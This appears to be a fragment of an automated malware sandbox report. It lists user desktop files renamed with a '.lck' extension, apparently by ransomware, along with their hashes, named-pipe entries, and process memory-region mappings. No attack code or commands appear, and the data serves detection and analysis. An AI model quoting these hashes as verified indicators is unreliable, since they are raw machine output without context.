C:\Users\Admin\Desktop\MountLock.mpp.lckMD5
61b6c6ce2f632b78db736404bc050d41
SHA1450ce46076c644cea4037a9b0d7448a15b36018d
SHA256522dc4865c193baf9b4fdd4d0018c5877453819286b5dcf9d9e0d1be22578597
SHA5128fd0734a19185bcfe2a2c30a82d6a44ab049b4517eecb9b619500c09a569df244ff7285bcbc0058c8d110d0c6aac680bc885765dd0838c527860d7707eef02de
-
C:\Users\Admin\Desktop\ReadRedo.vbe.lckMD5
b5668a09a737b029c1ff23cee71b0a44
SHA165be9308d600e0d326a285eb414260e046c44c58
SHA256ca203405d0c58d812d4b841923a0c4f77f091064404e237b94a0ac3d3326939e
SHA512462b8189c48586a13bb6f3aa22b125611935623b251b49f0038f3d6de169d52e63ea6835a9b3eb038b0dd444dad1034f1a0b4b11fa246d35306e7a304b7880bc
-
C:\Users\Admin\Desktop\ReadRequest.midi.lckMD5
e1298ced0ba4d4cede231e682e41b563
SHA133a1d5f958c91dcbe542657604952950c0f65051
SHA256f47c24ccf5c939faca662ed0d9db566e1f31c6826976abac7ab5ba26bb9cbb99
SHA5124a2a3e2a846035b1d1a6cb82691cb02ad1c8ae584ab1fca73ef34a1a622b799a10bab62fda623992dd190d2b693a9a6923d41b7385cdfa53f842e23228bc12eb
-
C:\Users\Admin\Desktop\ReceiveConnect.M2T.lckMD5
9573cc727abfc5e5f7389828612e1ed5
SHA1b4e693ff49ad69da6e26f72fbf140c7fa1b0c973
SHA2563962cb99f07447aacaa9a47b7cdc85d4ca1bea9855b7c958df70776639b02436
SHA512d4f50bbbb455fd59319f2d6f2d3744e572e6ca5d634a968c57483adeaba7a3cd34af96112c25b687226cfd691dfd30b42719e611f1b32aae94bed048f923438f
-
C:\Users\Admin\Desktop\RepairBackup.dib.lckMD5
96d4bc53605d48b086d163b84a8fe8b5
SHA136f71b38b0f81598b1af3568ec0bab135a53bb2c
SHA256e48325df32951a42cbe9ca428ed8ac6d76e3b15103e83d797e1b71ed069a33a4
SHA512deaf7010096a290998bb4b19613e82233558839544db868604d4779687b27c036036ac20bac86c79c0816b480742b8be6c5e0baf6218e5962fe8139c283b49a6
-
C:\Users\Admin\Desktop\RestartSearch.bmp.lckMD5
00c7a6d8b34adf1086c653557f883c1e
SHA1d2f19ee1b77dab2dc55e499445a5932ec581a479
SHA2569102ba38485f8471dafe0e5a2937daf56512244d19064d1997786be8f298bc5d
SHA512f30311040f5ad6b97d4dec7bea587deeaab665267fc0fd05d0c19859c28d1e5e9188c54b0b7a88407949dc07c50ea1dae733a3ebc153c615d43b4e15ad69c882
-
C:\Users\Admin\Desktop\ShowSearch.gif.lckMD5
bff018027fd2ff924d0b4e8b42572769
SHA135a80e1133199ad03bf4f21da9395fdf75e6ce8f
SHA25685fd6a9a93acedaedb7f092df4db336b28e1be0b7ab9ed70857fbec9916dce8b
SHA512d0b4b939f492f7664c2dcd21f450f7742dd7a22bfb3fa52f3dd64a4b0eb977df4fc2219802c06c9c11e698d85e2d75a378a6b09a7d83fc555a2426a13acf1e02
-
C:\Users\Admin\Desktop\StartInitialize.png.lckMD5
c2fe7cca4815a267eaf0561eea83718e
SHA1d02e0ec44bc9e39537e1a33512e4ba02e7e5e252
SHA256bb3d1e11597c565a47fee2f53dd53c6f063b1aa093f19ce74ab2f0edb46bd71d
SHA5124f180a9635e326b574d224560a1d12a693e0d9df3627b5a0d7de949b2552bea524bef4e94585d25c3deafb99dcc9241ca20018c269e0c49a7c1b65d2887319e2
-
C:\Users\Admin\Desktop\StopSelect.dotx.lckMD5
a43e9ec984eb27e9af43cd55512e05fa
SHA10ad601e7a32fac7f3c9b6bd74eadd111f9d1b7e2
SHA256c66ed45ebaabff9ba5d4fda463e4c0db11367e0f1709a73b3ec28fd4077fcf2c
SHA5126a902fbdaaf9a61057e3b24d246388239a9bdd1f06edd286a8abf63789c0653a7a58ea7a259bc271035d201e60b0d5b3204a356c76cd28effdee4730a5987438
-
C:\Users\Admin\Desktop\UnblockSearch.svg.lckMD5
4a38bea7c0e0461271076f0f1520c477
SHA14b7d02b5474e9f26792d881a8c39c3eb94bf9408
SHA256e23524fdb90459f86d56a35473cfd8fc9433c063a8ebea8c8594cb42be224e10
SHA51228d6e86b0c3e7b273b26425cdc4a89c6c1a4ad9e64b1c2380e8556fe6c16d37ece17e718ed302daed94f232f6464337ba9df244aaae1d8bd54ce4af5f6b59f45
-
C:\Users\Admin\Desktop\UndoPush.cab.lckMD5
5f432558f1514be7fe90aaec3336fb96
SHA1eb42a7b956afafce7cf44ffc2469d692326a0520
SHA2565795d7c60748e5598753395b14affa85feec8df8aebbab23f43d3fafce3594aa
SHA512961f014e93567577ceebfe84bac98b5f14fdeb6fd6110accd51337b4359cedb15aa356c93b59e5d8467fbf87a7127fb15e2c039f7f5e26049d19bc0c4a4956d1
-
C:\Users\Admin\Desktop\WatchStop.ps1.lckMD5
c1f4662b4cc66249163264f51e37232c
SHA18e893007415fd39dca510f394c24860c8bc766c6
SHA256cdb1b3ebbd3448c77bbfe99d54846dba28f19f435d1528eb7a983d7372f55e34
SHA512086f9ee4a009c6e70e27b5ee7f245c7d8bf6549dd0c88fe4346880a96b801fd4532b38242b56cbffde25e9c8442bce74bba3bc46c867853c40b6872e8a6a99ab
-
C:\Users\Admin\Desktop\desktop.ini.lckMD5
9c1c171bc7b060a6fbc7ff28f78e8e35
SHA124eccdc8348afd467ca6cbc3b421fd96f45a016c
SHA256bff907843554b85cc4740dccfddb697d37cdc3bf7dbd0c7326e0525c1f9bf06d
SHA512ac62350d5bfd8e55a58a9b383e306323ae2413cc0893fd76f9f29409a57ee373f1bff3284e2014a99749660ba48b43dec0a9293ec2a79d3506f144d066dcacc3
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/220-239-0x00000000FFE91000-0x00000000FFE93000-memory.dmpFilesize
8KB
-
memory/224-69-0x0000000000000000-mapping.dmp
-
memory/280-149-0x0000000000000000-mapping.dmp
-
memory/560-32-0x0000000000000000-mapping.dmp
-
memory/616-79-0x000000001ABE0000-0x000000001ABE2000-memory.dmpFilesize
8KB
-
memory/616-83-0x000000001B700000-0x000000001B701000-memory.dmpFilesize
4KB
-
memory/616-72-0x0000000000000000-mapping.dmp
-
memory/616-76-0x000007FEF4C90000-0x000007FEF567C000-memory.dmpFilesize
9.9MB
-
memory/616-80-0x000000001ABE4000-0x000000001ABE6000-memory.dmpFilesize
8KB
-
memory/616-123-0x0000000000000000-mapping.dmp
-
memory/620-129-0x0000000000000000-mapping.dmp
-
memory/680-33-0x0000000000000000-mapping.dmp
-
memory/680-61-0x00000000FF831000-0x00000000FF833000-memory.dmpFilesize
8KB
-
memory/680-131-0x0000000000000000-mapping.dmp
-
memory/680-60-0x0000000000000000-mapping.dmp
-
memory/684-6-0x0000000000000000-mapping.dmp
-
memory/740-139-0x0000000000000000-mapping.dmp
-
memory/740-196-0x000000001AA24000-0x000000001AA26000-memory.dmpFilesize
8KB
-
memory/740-68-0x0000000000000000-mapping.dmp
-
memory/740-195-0x000000001AA20000-0x000000001AA22000-memory.dmpFilesize
8KB
-
memory/740-192-0x000007FEF4BF0000-0x000007FEF55DC000-memory.dmpFilesize
9.9MB
-
memory/816-97-0x0000000000000000-mapping.dmp
-
memory/936-64-0x0000000000000000-mapping.dmp
-
memory/936-99-0x0000000000000000-mapping.dmp
-
memory/960-235-0x000000001A8B0000-0x000000001A8B2000-memory.dmpFilesize
8KB
-
memory/960-236-0x000000001A8B4000-0x000000001A8B6000-memory.dmpFilesize
8KB
-
memory/960-85-0x0000000000000000-mapping.dmp
-
memory/960-186-0x00000000024F4000-0x00000000024F6000-memory.dmpFilesize
8KB
-
memory/960-231-0x000007FEF4BF0000-0x000007FEF55DC000-memory.dmpFilesize
9.9MB
-
memory/960-182-0x000007FEF4B80000-0x000007FEF556C000-memory.dmpFilesize
9.9MB
-
memory/960-185-0x00000000024F0000-0x00000000024F2000-memory.dmpFilesize
8KB
-
memory/1020-105-0x0000000000000000-mapping.dmp
-
memory/1028-13-0x0000000000000000-mapping.dmp
-
memory/1032-35-0x0000000000000000-mapping.dmp
-
memory/1032-125-0x0000000000000000-mapping.dmp
-
memory/1036-217-0x000000001AD64000-0x000000001AD66000-memory.dmpFilesize
8KB
-
memory/1036-41-0x000000001AD40000-0x000000001AD41000-memory.dmpFilesize
4KB
-
memory/1036-44-0x0000000002060000-0x0000000002061000-memory.dmpFilesize
4KB
-
memory/1036-43-0x000000001ACC4000-0x000000001ACC6000-memory.dmpFilesize
8KB
-
memory/1036-14-0x0000000000000000-mapping.dmp
-
memory/1036-42-0x000000001ACC0000-0x000000001ACC2000-memory.dmpFilesize
8KB
-
memory/1036-212-0x000007FEF4BF0000-0x000007FEF55DC000-memory.dmpFilesize
9.9MB
-
memory/1036-47-0x000000001C360000-0x000000001C361000-memory.dmpFilesize
4KB
-
memory/1036-216-0x000000001AD60000-0x000000001AD62000-memory.dmpFilesize
8KB
-
memory/1036-40-0x0000000001E90000-0x0000000001E91000-memory.dmpFilesize
4KB
-
memory/1036-45-0x0000000002120000-0x0000000002121000-memory.dmpFilesize
4KB
-
memory/1036-39-0x000007FEF4C90000-0x000007FEF567C000-memory.dmpFilesize
9.9MB
-
memory/1036-36-0x0000000000000000-mapping.dmp
-
memory/1056-127-0x0000000000000000-mapping.dmp
-
memory/1072-89-0x0000000000000000-mapping.dmp
-
memory/1120-208-0x000000001AC84000-0x000000001AC86000-memory.dmpFilesize
8KB
-
memory/1120-24-0x0000000002570000-0x0000000002571000-memory.dmpFilesize
4KB
-
memory/1120-23-0x000007FEF4E90000-0x000007FEF587C000-memory.dmpFilesize
9.9MB
-
memory/1120-21-0x0000000000000000-mapping.dmp
-
memory/1120-207-0x000000001AC80000-0x000000001AC82000-memory.dmpFilesize
8KB
-
memory/1120-210-0x000000001C3C0000-0x000000001C3C1000-memory.dmpFilesize
4KB
-
memory/1120-22-0x000007FEFBA01000-0x000007FEFBA03000-memory.dmpFilesize
8KB
-
memory/1120-27-0x000000001AC80000-0x000000001AC82000-memory.dmpFilesize
8KB
-
memory/1120-203-0x000007FEF4B50000-0x000007FEF553C000-memory.dmpFilesize
9.9MB
-
memory/1120-26-0x0000000002620000-0x0000000002621000-memory.dmpFilesize
4KB
-
memory/1120-30-0x000000001AB50000-0x000000001AB51000-memory.dmpFilesize
4KB
-
memory/1120-28-0x000000001AC84000-0x000000001AC86000-memory.dmpFilesize
8KB
-
memory/1120-29-0x00000000026D0000-0x00000000026D1000-memory.dmpFilesize
4KB
-
memory/1120-25-0x000000001AD00000-0x000000001AD01000-memory.dmpFilesize
4KB
-
memory/1172-141-0x0000000000000000-mapping.dmp
-
memory/1172-7-0x0000000000000000-mapping.dmp
-
memory/1272-16-0x0000000000000000-mapping.dmp
-
memory/1272-220-0x00000000FFC81000-0x00000000FFC83000-memory.dmpFilesize
8KB
-
memory/1300-86-0x0000000000000000-mapping.dmp
-
memory/1304-62-0x000007FEF7810000-0x000007FEF7A8A000-memory.dmpFilesize
2.5MB
-
memory/1320-103-0x0000000000000000-mapping.dmp
-
memory/1340-3-0x0000000000000000-mapping.dmp
-
memory/1344-143-0x0000000000000000-mapping.dmp
-
memory/1348-145-0x0000000000000000-mapping.dmp
-
memory/1352-117-0x0000000000000000-mapping.dmp
-
memory/1380-155-0x0000000000000000-mapping.dmp
-
memory/1396-151-0x0000000000000000-mapping.dmp
-
memory/1408-113-0x0000000000000000-mapping.dmp
-
memory/1448-18-0x0000000000000000-mapping.dmp
-
memory/1448-93-0x0000000000000000-mapping.dmp
-
memory/1500-180-0x000000001B6C0000-0x000000001B6C1000-memory.dmpFilesize
4KB
-
memory/1500-178-0x000000001AAA4000-0x000000001AAA6000-memory.dmpFilesize
8KB
-
memory/1500-147-0x0000000000000000-mapping.dmp
-
memory/1500-177-0x000000001AAA0000-0x000000001AAA2000-memory.dmpFilesize
8KB
-
memory/1500-173-0x000007FEF4BF0000-0x000007FEF55DC000-memory.dmpFilesize
9.9MB
-
memory/1560-157-0x0000000000000000-mapping.dmp
-
memory/1560-5-0x0000000000000000-mapping.dmp
-
memory/1604-135-0x0000000000000000-mapping.dmp
-
memory/1604-190-0x00000000FFEB1000-0x00000000FFEB3000-memory.dmpFilesize
8KB
-
memory/1616-115-0x0000000000000000-mapping.dmp
-
memory/1652-87-0x0000000000000000-mapping.dmp
-
memory/1668-52-0x000007FEF42A0000-0x000007FEF4C8C000-memory.dmpFilesize
9.9MB
-
memory/1668-59-0x000000001C1F0000-0x000000001C1F1000-memory.dmpFilesize
4KB
-
memory/1668-48-0x0000000000000000-mapping.dmp
-
memory/1668-56-0x000000001ACE4000-0x000000001ACE6000-memory.dmpFilesize
8KB
-
memory/1668-55-0x000000001ACE0000-0x000000001ACE2000-memory.dmpFilesize
8KB
-
memory/1716-153-0x0000000000000000-mapping.dmp
-
memory/1732-91-0x0000000000000000-mapping.dmp
-
memory/1732-34-0x0000000000000000-mapping.dmp
-
memory/1732-10-0x0000000000000000-mapping.dmp
-
memory/1832-12-0x0000000000000000-mapping.dmp
-
memory/1832-119-0x0000000000000000-mapping.dmp
-
memory/1840-8-0x0000000000000000-mapping.dmp
-
memory/1840-121-0x0000000000000000-mapping.dmp
-
memory/1860-11-0x0000000000000000-mapping.dmp
-
memory/1864-2-0x00000000760B1000-0x00000000760B3000-memory.dmpFilesize
8KB
-
memory/1868-111-0x0000000000000000-mapping.dmp
-
memory/1868-222-0x000007FEF4B50000-0x000007FEF553C000-memory.dmpFilesize
9.9MB
-
memory/1868-225-0x000000001ACD0000-0x000000001ACD2000-memory.dmpFilesize
8KB
-
memory/1868-226-0x000000001ACD4000-0x000000001ACD6000-memory.dmpFilesize
8KB
-
memory/1876-137-0x0000000000000000-mapping.dmp
-
memory/1884-133-0x0000000000000000-mapping.dmp
-
memory/1984-9-0x0000000000000000-mapping.dmp
-
memory/1984-109-0x0000000000000000-mapping.dmp
-
memory/2004-95-0x0000000000000000-mapping.dmp
-
memory/2008-107-0x0000000000000000-mapping.dmp
-
memory/2016-31-0x0000000000000000-mapping.dmp
-
memory/2016-101-0x0000000000000000-mapping.dmp
